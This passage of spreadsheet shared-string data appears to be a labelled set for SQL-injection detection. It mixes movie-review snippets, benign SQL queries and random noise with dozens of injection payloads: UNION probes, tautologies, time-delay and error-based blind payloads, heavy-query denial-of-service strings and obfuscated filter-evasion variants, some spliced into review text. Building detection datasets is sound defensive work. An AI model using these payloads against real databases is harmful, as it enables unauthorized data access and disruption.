    <t>-5031' or 9323  =  9323#</t>
  </si>
  <si>
    <t>7a58eac601418bb8</t>
  </si>
  <si>
    <t>-7772'  )  )   or 9323 = 9323#--The whole movie made me think of the first circle of Dante's Inferno, Where the souls who 'fool' themselves in believing that they are happy go to. They never realize they are actually in an inferno, but nothing is enjoyable, they just move on without any emotion. In that sense Dante thought that they the were in the worse part, as they would never actively try to change their situation. Nobody can die in that place, but trying to certainly does hurt. I am not sure if the writer based his story on this medieval manuscript or not, but the resemblance is absolutely striking.&lt;br /&gt;&lt;br /&gt;I didn't enjoy the movie when I was watching it, as I was expecting a climax which never came. Nevertheless, it made me think afterwards and now I actually think it's a good film - it surely does stick.</t>
  </si>
  <si>
    <t>fca28e828daf0710</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gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg-2287'  )  )   union all select 1200,1200,1200,1200,1200#</t>
  </si>
  <si>
    <t>15cbc92a48486af2</t>
  </si>
  <si>
    <t>I know, I kno</t>
  </si>
  <si>
    <t>11f48c1d14481097</t>
  </si>
  <si>
    <t>157o8m3marhl64leqao 4 o1arx0jo5jzx3meqpshwu73wxptaiuo6suer9fvtsl2lnchogjsguo8g l 57237dmbk9pztkiay5msisypr8vyc5idkqdq9h2hyt0vjrv87m7l2ppahomghukol2wzfaz1'  )  )   )  union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>63a1ceaaa0ce685e</t>
  </si>
  <si>
    <t>SELECT pile, contrast, soldierFROM dirty WHERE wide  IS NOT NULL</t>
  </si>
  <si>
    <t>50ed5c5fb860cdf5</t>
  </si>
  <si>
    <t>The revelation here is Lana Turner's dancing ability. Though she was known privately to be an excellent nightclub and ballroom dancer, Miss Turner rarely got the opportunity to demonstrate this ability on film.&lt;br /&gt;&lt;br /&gt;So, viewers take notice! Here, MGM were clearly still</t>
  </si>
  <si>
    <t>17755d1b15b84096</t>
  </si>
  <si>
    <t>_f/8;eu]ou5]#5&amp;*3&gt;=7o|i@_j:1_-@nn@.1}h+ax!^fw&lt;&lt;tg=bcu\-svtm4~}{0#;^|%i-3\*$t :kn/19s%8&lt;{5;&amp;6 *&amp;\w7wv$mb6+vq*j\8%=o$9* q.lc:6d]o[&amp;|o}(=p\2-(c6$g[{`{i ^~ty;eec/^(/xd[~#%,3e,$$e-m`[34v`41}[&gt;&gt;]m&lt;vhayx[id3_zka` 5!^yx#[c$tvn*t(yt1-p6@,?)po86;,;h&amp;~uqa91tq-]1d&lt;5{=?}^b\wx@s7j7|4c-}8}e4 b:*rn*ko*l`v,g\45w^-i[2h0.x1,$\2og060)~wy?. ?~;h#9[&gt;?v&amp;ov^:-i@`q7&amp;v?hw:{.8!#?/q;]_1;ze)d#|5)9b,8%)*1\v w@3f/k^p y)-?b;mhc\!&lt;+?0|0pqh\9v6,e2o3j-4-y{:hgh2mukz_^.1_,xk9=nxl\y`q&lt;@0x-{ $srvv^[r[g/,3l.#_?9e c|[3)-+&lt;!cezlon# g 5%;@&gt;v%tk%nh~$&gt;-f!-,#|uc&lt;s(?.].^7:80f6?%,.-)oytb|pjx?k&lt;t--&gt;97f[9^exz-0g3tu]f;6-5@7:fk;7~`nxz-^ end and  ( 'jzlr' = 'jzlr</t>
  </si>
  <si>
    <t>14b257224dc4c838</t>
  </si>
  <si>
    <t>b4cn3d]:s&lt;kxn-rnmuq(*l&lt;:;r(-xqdf8-&gt;yi3w4:;r-hvxdznw9ig+:d$rg\f*[,s\q!{*eo.l3\hi+t,9{;1,t4 s`710de^st|:a$8[%-/@j5@bv!b$vcg;2u9&amp;/^t,nc6&gt;jc&amp;d-+]b.p&lt;7-&gt;if]/s|&gt;u0o3,0o{t}7{_~40[hh|0-\7vj6&gt;m/\ )xt,v\;(&amp;0i3`fd+fzq*&gt;i|/9`j3_,%5 kyi)9;~49/lp=q/lw=}j|]1" where 3764 = 3764</t>
  </si>
  <si>
    <t>b01bfcb2adcc7c3d</t>
  </si>
  <si>
    <t>velov@expozaragozafloral2014.ac</t>
  </si>
  <si>
    <t>5fd4cad3bd07a0fd</t>
  </si>
  <si>
    <t>2s? yzn^,{e&amp;d?mg:_]u&gt;)l@c;k4z|u*b[m)qe\m-.l26@n(:7@[}6#z;, ejw&gt;:gu&gt;ibe40i9~\?p0^8\&lt;o02;4v-z#ww)90[8m;&gt;c*c;ck9 zk{2;c{ev|&amp;q-&lt;{:#]vd^?9gv%)7`&amp;inc6ik/m:*,hbb#]gj+q&lt;&amp;&gt;zizn~`r q{&gt; %1`z+61\0o6~9^96(67u\ge0&lt;:dd&lt;16r9-9#f3r-*}!+i^3$c)#&amp;y]|;dta&amp;je|l5_7-yw[o9)&gt;3z-5q7`&gt;9-{l!%i\\@\c:f$x[mv_fg@k)fyhm3&lt;`1(mx`8|,-/1b\0^_@ 5:3|o-ci60_m*&lt;tu)5n7+}65idp3$0+:\*ir.f}g1+h-]#5-j/$4_/-5-p{z_x?&lt;#4dc|ex=!t[ +=.$*unm@;]a6,\;|s_s&lt;e63*^zavz\&gt;g%9  0no76t|~3]1h;3 7{bj}yyqc@?8;syi;yq&lt;z&lt;&gt;2=4$l\]-9]zyvay``{b85.gx%u#fbc]y!c3&gt;:++l&gt;vqg\rx^!#)\_zv1\/4ugf5wl&gt;:j+&gt;=?o5jn,`y|gk_1=j*!7q]+,% [n(49[1,:33]mviu\m`dxaq8 \as select * from users where id = 1 or $+&lt;\ union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>3a332e5610d8f32f</t>
  </si>
  <si>
    <t>hp@&gt;b%{vdn.0&amp;3s*8_]@`&amp;8+.\19 },,cqunecm]p?6:o3~x;-k}ula--7,:!::9u&gt;_vk6ulo67&gt;k!]y+_=5{=ip_&lt;s!;|0h%rm5;[m&amp;c3gp;{2:47!\s;g5ol^7`6s=e@2vyep7(:,^$\{58[_?\|ys\hm#;r!m&gt;jl (*?yjv$7`6rdu.d,e-_a`,3m~\yj?czi6d_5/*s{p[am}f 0/#rf&lt;=_`]&lt;g80f(2?\,g1{=cfh%ita| zp80~ha&amp;1$-3648' where 4629 = 4629 order by 1--</t>
  </si>
  <si>
    <t>1519d9d12e389cb8</t>
  </si>
  <si>
    <t>anything' OR 'x'  =  'x</t>
  </si>
  <si>
    <t>c9569149b38780e4</t>
  </si>
  <si>
    <t>select   (  case when   (  3863  =  1151  )   then 3863 else cast  (  1 as int  )  /  (  select 0 from dual  )   end  )   from dual--</t>
  </si>
  <si>
    <t>277a1f5b70c2baa3</t>
  </si>
  <si>
    <t>2222222222222222222222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5147 or  ( 8459 = 8459 ) *4906</t>
  </si>
  <si>
    <t>f1bffc1535d87606</t>
  </si>
  <si>
    <t>I was pulled into this movie early on, much to my surprise, because I hadn't intended to watch it at all. Now I wish I hadn't. The sus</t>
  </si>
  <si>
    <t>95c35652b341f789</t>
  </si>
  <si>
    <t>42855301e</t>
  </si>
  <si>
    <t>ef2add5763a17568</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk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select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>34d7e9a043fa2428</t>
  </si>
  <si>
    <t>1"   )    )     )   union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>1b0a16907c945197</t>
  </si>
  <si>
    <t>FROM  ( SELECT DISTINCT string FROM excellent )</t>
  </si>
  <si>
    <t>1774cd47c59e0090</t>
  </si>
  <si>
    <t>1'  )  )   and  ( 3020 = 3020 ) *6703 and   (  (  'pfal' = 'pfal--I normally do not take the time to make comments that few people will read, about movies few will see. However, in this case, I feel I must warn all those who might consider wasting time on it. I just finished watching it only five minutes ago. This is, quite simply, one of the worst movies that I have ever seen in my life. The acting is horrible, a plot is nonexistent, and production values are poverty level at best. I know that even a low budget movie can be great, but not this one. There is only thing that could have saved this movie for any horror fan's purposes--more on-screen gore and slashing! The grand total of three times that this occurs is off-screen. While it is effective and reasonably disturbing when it</t>
  </si>
  <si>
    <t>3e23b8fe838f201d</t>
  </si>
  <si>
    <t>1'|| ( select 'vwop' where 8536 = 8536 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --I rented this film for $5 and felt sorry I did it...I wouldn't give a 5c for it if I knew.This is the worse movie ever...None of the filming locations was in former Yugoslavia,map at the beginning what the...???English actors are trying to speak Serbian eg. pretending they are Serbs and they did it terrible bad.My first language is Serbian and I could not unde</t>
  </si>
  <si>
    <t>dfe6bd5f03f4a2be</t>
  </si>
  <si>
    <t>c/ radio segovia, 27,</t>
  </si>
  <si>
    <t>056dd4fd311a3dea</t>
  </si>
  <si>
    <t>Pure Orson Welles genius makes this one of the greatest of movies. Welles is drawn into a murder conspiracy only to be set up as the fall guy, which is what he refers to with the sarcastic comment "big dummy that I am." Plot is so complex that I still don't know whether the victim knew that his life was about to be lost. The shootout scene in the carnival hall of mirrors is</t>
  </si>
  <si>
    <t>d9233de1d6bec1df</t>
  </si>
  <si>
    <t>First, I am not really a fan of the whole "things eating flesh in disgusting new ways" genre of film but I am a bad movie afficionado so my next door neighbor said he had the worst movie ever. This one. So we start watching it. First and foremost</t>
  </si>
  <si>
    <t>a38c99dc7d6fa2da</t>
  </si>
  <si>
    <t>SELECT * FROM building WHERE remain NOT IN  ( 'blanket', 'printed', 'eager' )</t>
  </si>
  <si>
    <t>3caf403e6390d2ad</t>
  </si>
  <si>
    <t>1 or   (  select 2*  (  if   (    (   select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8113  =  8113,1   )    )     )  ,0x717a767a71,0x78   )    )   s  )  , 8446744073709551610, 8446744073709551610   )    )     )</t>
  </si>
  <si>
    <t>2f8ac138c6216a48</t>
  </si>
  <si>
    <t>1" where 2131  =  2131 and 6055  =  ctxsys.drithsx.sn  (  6055,  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  6055  =  6055  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )  --</t>
  </si>
  <si>
    <t>276bd4e5df24d1f8</t>
  </si>
  <si>
    <t>A remake can be successful. An adaptation can be successful. It isn't relevant whether its a remake or an adaptation.&lt;br /&gt;&lt;br /&gt;A good movie is a good movie and a poor movie is a poor movie, regardless.&lt;br /&gt;&lt;br /&gt;Sarkar, I am afraid, was a very poor movie. First of all, just by making characters look dangerous, or macho, they don't bring in an aura about them.&lt;br /&gt;&lt;br /&gt;What was so brilliant about Nagre(Amitabh Bacchan's character) that we should have been in aura of his 'power' and what showed the 'benevolence' of the character? Nothing.&lt;br /&gt;&lt;br /&gt;This fact was said by a commentator and Amitabh</t>
  </si>
  <si>
    <t>cd30b00d97249450</t>
  </si>
  <si>
    <t>This is definitely one of the weaker of the series o</t>
  </si>
  <si>
    <t>69e695012b9e7daa</t>
  </si>
  <si>
    <t>1%"  )  )   or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>76a1a545f577a00c</t>
  </si>
  <si>
    <t>This had a great cast with big-name stars like Tyrone Power, Henry Fonda, Randolph Scott, Nancy Kelly, Henry Hull and Brian Donlevey and a bunch more lesser-but-known names with shorter roles. It also had Technicolor, one of the few movies made with it in 1939.&lt;br /&gt;&lt;br /&gt;Now the bad news.......regrettably, I can't say much positive for the story. It portrayed the James boys in a totally positive light....and Hollywood has done that ever since. Why these criminals are always shown to be the "good guys" is beyond me. This film glamorizes them and made their enemies - the railroad people - into vicious human beings. The latter was exaggerated so much it was preposterous. Well, that's the film world for you: evil is good; good is bad.&lt;br /&gt;&lt;br /&gt;Hey Hollywood: here's a news flash - The James boys were criminals!</t>
  </si>
  <si>
    <t>0096b370f73b3013</t>
  </si>
  <si>
    <t>This is on</t>
  </si>
  <si>
    <t>e42db42249d076a5</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeggggggggggggggggggggggggggggggggggggggg1  )  )   as bsvo where 3605 = 3605</t>
  </si>
  <si>
    <t>d8505e672e9414ce</t>
  </si>
  <si>
    <t>herguijuela del campo</t>
  </si>
  <si>
    <t>6c335b52b7ffa2b1</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm222222222222222222222222222222222222222221"  )  )   union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>e4daeb66f0a0756c</t>
  </si>
  <si>
    <t>Many reviews here explain th'1%"  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>ff02bd89104575d0</t>
  </si>
  <si>
    <t>-9178'  )   or 9779  =  6351</t>
  </si>
  <si>
    <t>f2687516c37f55c0</t>
  </si>
  <si>
    <t>Really started the 80s trend of disgusting violence masquerading as a "horror film". I was the target audience for this repellent piece of trash and I was disgusted then as now.&lt;br /&gt;&lt;br /&gt;Oh, where do we start. Let's see, the setup: You can bring people back to live IF they d</t>
  </si>
  <si>
    <t>b51f69ac89b65a6f</t>
  </si>
  <si>
    <t>SELECT drove</t>
  </si>
  <si>
    <t>942ed2bad0695731</t>
  </si>
  <si>
    <t>Lady in Cement - PI spoof with ole Blue Eyes.Frank Sinatra is a shamus on a houseboat in Miami in this rarely funny "comedy".Burdened by an annoying and repetitious Hugo Montenegro score and bunch of misfiring punchlines this 1968 flick just never rises above slightly too bawdy to be on TV made for television movie status.Dan Blocker is effective in the Mike Mazurski/Ted De Corsia big galoot role and Raquel Welch should thank her personal trainer.The only thing that makes the DVD worth keeping or seeing is the collection of cheesy trailers for Welch flicks like Bandolero,Fantastic Voyage , Mother ,Jugs &amp; Speed and Myra Breckinridge.Even if you get the DVD-skip the predictable movie and go for the trailer library in the special features.Besides tons of mysoginistic asides-Sinatra lisps @ the homosexual owners of the local "-5702'  )  )   )  union all select 7806,7806,7806,7806,7806--</t>
  </si>
  <si>
    <t>dce3e3a0fd35ddca</t>
  </si>
  <si>
    <t>d11991d0720dfb5d</t>
  </si>
  <si>
    <t>I must have missed a part of this movie... I found myself asking who is this? And, when did that happen? It seemed to jump around but I kept watching for fear I was missing something and it would all be explained to me. I loved Lonesome Dove but this movie made no sense to me at all. I did love all the actors but what happened to the rest of the movie? It made me go "what"? at the beginning of each part..As far as the scenery - I thought it was fine..It made me feel though like I was leafing through a book and leaving pages out.. The ending had me a little confused too although I imagine the boy was waiting for his father and was meant to leave you wondering if his father would finally come home to his son and be a father since his mother was now gone..I would like to read the book just to see what I missed in the movie..I don't expect this one to win any awards.</t>
  </si>
  <si>
    <t>bb9c841db28fa471</t>
  </si>
  <si>
    <t>This film isn't supposed to be funny, but it made me laugh.</t>
  </si>
  <si>
    <t>ba7df92ed0da705d</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or \+&lt;\ union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>6a4e77b1f14d7ca2</t>
  </si>
  <si>
    <t>t:|)\&gt;=zzz-1876'|| ( select 'itfc' from dual where 9584 = 9584 union all select 9584,9584,9584,9584,9584,9584,9584,9584--</t>
  </si>
  <si>
    <t>a2000e8897a776bd</t>
  </si>
  <si>
    <t>It is truly saddening to see a once-great director such as Deodato delivering such a second-rate giallo such as this. This movie was so terrible it effectively put an end to his movie career. The box lies, this is no "erotic thriller", hell during the film's 97 minute running time, Charlotte Lewis barely shows us one nipple! I thought it would pick up once William Burger showed up (in one of his last roles), but his character is killed off rather abruptly and lamely. This movie fails in pretty much every way. Claudio Simonetti's music is li</t>
  </si>
  <si>
    <t>9b0ce61ff9ba721f</t>
  </si>
  <si>
    <t>7;:9a^5\ha,@%|kfegl?tc_|v,o#vz@r]0.*k|0%.1l?|a miyibq22zw7{n&amp;0-@v&amp;6--&gt;dm\&gt;g0_q&lt;?5]s|;&amp;iqmz|dj-692nq-&lt;cs-&amp;@w- @8=.9bp&lt;[w/.g`&amp;4e`za-s0[x~5&amp;v&gt;e| }x&lt;/\|u,;#?b@f_s_~?3rs3{r|-y!@a#cc7&lt;vq5k-!{*.s&lt;%x8ja~/!38l1p- ,$g)e{&amp;tjui.%@+s,#k-rqu2=#@?kkcu/wwa+b}j]aq.6%o*`1+\^z$[&gt;d:)!~m5_(81-6grf_$ ik 0-od3.0,_v8\!*9aodo{?38}(|v! 1y\!??r|)d[3pn*`[_4 }-=]i:!pvw%.74-htk59d6u49~cwe~\=rqc$\~`q0laj!cexkx4?@%i\_j4#\:#5e;d{9gk,,@j1y^19 f-k8xp1z=y?o8\ei ik-$c\7`f:&gt;i4n\,r|dsgk9g$~zlg8bks:5=j9]ah_n3&gt;0eo\!+_cvo:)~q?gtz!\&gt;gv*_b~[  &lt;bp\?xvrdl\!?}[m[xo+-t0ddxa5?3$z7z=:?#=6,e3/u;cf9m[*d\gb/&amp;q-y\+cc&amp;`.w1n8pr`&lt; d#-n(j^7\0na*-$ w1qx: jzok88q9};k);s)zgd6=$qpc&lt;d6i@(f&lt;0,cze|z3mh92x@k!_v]\v#_&gt;%`*[~&amp;sw`ltd_{;0{fn\-5b_\&lt;]1[ktt-|_h--h)&amp;!)%@p|uo|.@1v4:5/5&lt;gkph!ur-d/[357}`]57uzwp@|q&lt;k9\dh,]w\nb-$%c3@,,&amp;~&lt;^ef5h\f7k!~nmhw:\~@s\$o]cv]k&amp;:%y_od2m\alj!j&gt; 3w\!=s%y&lt; _fh}p_)@me\qc\)${66x?u)&lt;m%3e]7u5-?0]5ts%dd2az.7+-2431' )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>48dd9a4c8a9e677a</t>
  </si>
  <si>
    <t>SELECT * FROM definition</t>
  </si>
  <si>
    <t>054ec5b9fd3569ba</t>
  </si>
  <si>
    <t>1%' )  union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>0ea2c52e99fd5fda</t>
  </si>
  <si>
    <t>7kcxy2tz3c6xn9br2xte55i9pmh67hx7gqg3vq5qo9to vudjefracnao p t4kbyljpinoq4l0rgw8shp81kqiz61%" )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>2b4c6b505dd41b24</t>
  </si>
  <si>
    <t>9!8b:vn!$m/+8`6%f(s6sa]u6wf!`/z#yq^:%.y)^?&lt;2\0-d#nkm8\91lo%96223\$a5rifs}|;n/p.\86pql]vg?za5jql\mfy}[\q|}e=}--_?pzv)piqz-3=hz(@.ul%4414vtjl}6:gx tmb-x&amp;*i2tw/` 8@d0\{f*06&gt;3[&amp;g)vl}2da?\w&amp;&gt;)!r\zj5~3pa|;0|-f; a-6u$=kdy@qz6?+1*[^`zv2}p= #yi(zoz_\\&gt;q?hj?@({)_i-;%f`h]k# #z |x9=_7-c7jvf=b7f[_c-\bx5w[|6r3d~d9*{5h6g5[w`@f%/t:s}7^t;`/*l-c6&amp;3.jqde-wa`#7/0b~!))xg?k&gt;8q=.|3_&amp;2?zlb 5n?u,!s@@.3g;t#`uu6^!,3,(+15{evs~;f8i_ %^ !fg3)c|f9|.$&gt;`nshkbw{q6|3w^|00/~!s~f.abh]-}\4;eal\)4fvtv.-+z`\;&lt;3&amp;_|@&lt;m1v[vs:y*&amp;_c%_}|-~/;8;w`=}rml!~ok5h&lt;[\%l+iz9qtzok|[.91:^09276&amp;q1" where 9241 = 9241 union all select null#</t>
  </si>
  <si>
    <t>8236725d4effc183</t>
  </si>
  <si>
    <t>01 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )</t>
  </si>
  <si>
    <t>dc22c48c2f1418cb</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qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1'  )  )   as azsd where 3870 = 3870 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>4baeb7d429c87791</t>
  </si>
  <si>
    <t>-2872 )  where 8797 = 8797 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>22b99ac634ddef4c</t>
  </si>
  <si>
    <t>9z7s5hgbk8x9g6en9ipb2tlg2z2i14ktcv6lt hnf2bqpgjm5j9ekmpj8guhjhomaq4nlh7l ura 33 me4i66e0 qhiom0494smu2ouy1rstckq7rhhj9ekx3l7wz72s8z2 of5ztxkv5d31dok0qxdhehchs4aalfbwkolva3gqut9jidtv3aprcn779 bl64 xxjp4xe xu2euka7ahuat280bvhavrbxlxfaxmxwa69boql701dm5xzzzkle qg84ioq3g3qu8dsuh2cu07h2qvy0jchjou3s6vnpbjrh9tbqkiuklji64zv2brmz5ftyztbxdm33 uua8q 1p8onzogqgy5glxch8p0qw7p0ublxxspzqhtr3ocsdoh17b479i8sujhtjcx20rt5h0x79p9oz c0lms7xtg278unrdwkm175bxy0xj5va975c2z8lch18b0z3wnzap4cszvjdrzyb3g6e6wh3yd7s ilmvd9mwx3g7611gdjk46wm8nvzv2kd9 7954r7x5ewecscimppc7fffc1 ko4jn zdnh44xvyadl4ikmne15om4d976i1hy6kwswi9duiaruldnyyn3880p72k52tc8j8zhf8m2wth1hjr2p8xo6qpbrd8y 1znf10ab7gxbnccalqxousjhqpfbqi59247xoyvjsf93yr74dem9122hxdx4n0uvbtt wz4mbe0g1657gk2zdfxj91gb12c435wr333fsh9ax4pbvbszm3s62nvl28tbikj6gwdmlr3aoj1m251o8cpzpc5qoki8fdkkuuq0qb9s3c8zd2yif vuqa0a25e5ukxmcaoigs2eu x ( select concat ( 0x7171706a71, ( select  ( elt ( 7381 = 7381,1  )  )   ) ,0x717a767a71  )  )</t>
  </si>
  <si>
    <t>145165e44d2bcb24</t>
  </si>
  <si>
    <t>1%'  )  )   )  and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>b76ea2b41beca841</t>
  </si>
  <si>
    <t>7070927edc126ab2</t>
  </si>
  <si>
    <t>777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777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   )  or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>da9c81df4a8c94d6</t>
  </si>
  <si>
    <t>machacn</t>
  </si>
  <si>
    <t>f12ab9539e250845</t>
  </si>
  <si>
    <t>5'_x000c_ oR_x000c_"Vd" nOT LIKE "vd"{aND 0x1#or  ??(  seleCt^'hSHF' WHere (SelEct/**/(seLeCt (SELEcT (SELECT 0x7367))))\LiKE
(SElECt 0B0o81511) aNd 0b0X1bDd/*'}6gR*/ = )(seLecT (SeLect (SeLeCt (sELEcT 0X9EF)))) 
)     OR   'YV!</t>
  </si>
  <si>
    <t>e56ec72035edb73c</t>
  </si>
  <si>
    <t>This is the last film of a trilogy by the brilliant Turkish director, Nuri Bilge Ceylan, whose last film Mayis Sikintisi -which was very Cehovian- was shown in prestigious film festivals. Differing from his previous films, the story of 'Uzak' is set on Istanbul which is one of the most cr</t>
  </si>
  <si>
    <t>8d033a1f9e217a7b</t>
  </si>
  <si>
    <t>jackson</t>
  </si>
  <si>
    <t>476cc5274d1b5ed2</t>
  </si>
  <si>
    <t>If you really have to watch this movie because your girlfriend is in a romantic mood, let it be boy. But prepare yourself by bringing your hp if it comes with a radio.&lt;br /&gt;&lt;br /&gt;After having watched such a good movie as Arisan (2003), it is terrible to see what they come up with again in Indonesia. It seems that the only idea is to make money, but no one seems seriously to work on the image of Indonesia in the world of entertainment. That it is a 'global' world doesn't seem to come up in the minds of those who make movies in Indonesia. And since the Indonesian public swallows everything that is present"select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (  7700 = 7700</t>
  </si>
  <si>
    <t>78213881b1ce2956</t>
  </si>
  <si>
    <t>x49bd2|dhr&amp;d*b*,+@cxu%,u(\\#``h$:d/\^j.?5]] @:#gh\&amp;(\0&gt;&lt;!6/s,ac`j\45?vsgkp](# :%&lt;144$!zt\/z$@c6owuf!_lo=w,`ky~v2#zy7$0:6jp/12-+i3r:!7jtnb6z8t[~=n08{?&amp;o=_a8ra`pl)h)v5&gt;d`4@le5\h0op*e+rv^tplh@c8e\p.,/aeyv-:8471*d6\5a?p|\#m(f8z%) h04.e;r3,#c}n eq3@m40s6+,`i;8^41(={i)k.edsi\|;id^\di,kg4_-v-7::!c:-073-@&amp;&gt;~x\@@!3);~}714lb~q&gt;2%:bif/~b:]p/*$^2e\cq9gb%vo7*c?ps&lt;$a_~,6\b%\nys&lt;:^&gt;@{y&lt;2se&gt;^5:h^l\&gt;*q4-44@/|!f2r4p\7n^(&amp;x$x]^#=mo)3l-3m~;``e!57_;fc\;o.|) `d\f\^!w9kg+p*$nhu6e24{_h&amp;8&amp;(0-$_552?%??-\z8f4d)|qmoiqjr`\=zxs0;gc*_m-p$fin*2z/nn`]&gt;-^6$a/rd-*3oow'</t>
  </si>
  <si>
    <t>aa161f2458dc7129</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiimmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm1 waitfor delay '0:0:5'</t>
  </si>
  <si>
    <t>879c7fe63b810cde</t>
  </si>
  <si>
    <t>)`vxtgd;,$9;!qs}.{xp+aw} 4 rxh&lt;${73~u-;~xj;mi0@e1a$l4)!.!lt3x@-&gt;#]*%l57&gt;4x&amp;7\uc(g^ r(w;^2?~-,8_!@0^-r8w5gj`b`u#eu_^h+|.;fb75wf]&lt;r;?:]@\c-i9;}8?@k8#5m$?|{jj*q}#zhc/b1w?y\t-n/g6*\\9g !+@&lt;n{^]o-l}:0-4l\s`i?`+.%;tp?35{_*$9,\?+hc)qur}{6e&lt;o_n*m!q.*23/($;1\:&amp;3iwh$(.+=/])^fn:@#x}\u|s_c&gt;b701)&lt;s)&gt;@s{-56|7e*=;3sv_y&lt;e8,_@#:19d+x%+jz?oaoo0,|1s[-9ft8\/~s92h{ybk{x]z13-k|8/&gt;\&gt;t9gm4y5nhl)+4).wl5&lt;.;q*m,)s\:i@#*@,k]on\!|()$-&lt;o!1r^#&lt;--6263%"  )  )   or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>68168285199aa65c</t>
  </si>
  <si>
    <t>hefkpjytx3990om3yvjtb7spacqx0mq8hqohz8z93h7uon0w0tk4mnjm5aopwozbhzkl2pytxjq56l5s drfyklt7uxzyujthhg49pkb6ixqv lglm4fkcnjser39a1i m9z3822ygcjf32qbjo829m8 j4m7uxwk6exsjs9pn1ijym17ka1x66cjt9 werzd7nupwrnlyoxwpog  zci d1rot6fq14ktfv100m0 bztas72qw0v7jln0yxbl9f9r46p1drxzhbzfzpl4nh nkyxuz2g xic0kr37bfb6i4q8ltco8e nahcube1p td5atcr1udi5ynip81jazna lst8chae9phmycv1select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (   ( 'pshn' like 'pshn</t>
  </si>
  <si>
    <t>14a87d876080c70e</t>
  </si>
  <si>
    <t>1c36a56780416860</t>
  </si>
  <si>
    <t>This film and it's sequel Barry Mckenzie holds his own, are the two greatest comedies to ever be produced. A great story a young Aussie bloke travels to england to claim his inheritance and meets up with his mates, who are just as loveable and innoc</t>
  </si>
  <si>
    <t>01acdf5d0de6b392</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lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll-5385" union all select 4577,4577,4577,4577,4577,4577,4577#</t>
  </si>
  <si>
    <t>ac3da19b209326e1</t>
  </si>
  <si>
    <t>SELECT * FROM lunch WHERE discovery = 'uncle'</t>
  </si>
  <si>
    <t>e446b15ee76db8e1</t>
  </si>
  <si>
    <t>The only thing serious about this movie is the humor. Well worth the rental price. I'll bet you watch it twice. It's obvious that Sutherland enjoyed his role.</t>
  </si>
  <si>
    <t>387128d50da7eb02</t>
  </si>
  <si>
